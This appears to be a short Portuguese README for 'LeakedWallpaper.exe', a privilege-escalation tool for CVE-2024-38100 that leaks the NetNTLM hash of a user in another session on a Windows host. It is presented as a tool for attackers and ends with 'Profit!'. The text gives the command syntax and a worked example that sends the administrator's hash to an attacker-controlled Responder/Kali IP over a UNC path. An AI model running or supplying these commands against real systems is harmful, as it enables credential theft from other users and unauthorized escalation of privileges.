
Vazamento do hash NetNTLM de qualquer usuário. Corrigido no KB5040434.
Esta é uma ferramenta de elevação de privilégios (corrigida com CVE-2024-38100 no KB5040434) que nos permite vazar o hash NetNTLM de um usuário de qualquer sessão no computador, mesmo se estivermos trabalhando a partir de um usuário de baixo privilégio.
.\LeakedWallpaper.exe <session> \\<KALI IP>\c$\1.jpg [-downgrade]
# Example
.\LeakedWallpaper.exe 1 \\172.16.0.5\c$\1.jpg -downgrade
Se estiver bloqueado, veja demo.mkv
Imagine que temos duas sessões no host:
ID da sessão atual: 2
ID da sessão alvo: 1

IP do Responder: 172.16.0.5
IP do Windows: 172.16.0.2

Vamos obter o hash NetNTLM do administrator com a ferramenta!
.\LeakedWallpaper 1 \\172.16.0.5\c$\1.jpg
Lucro!
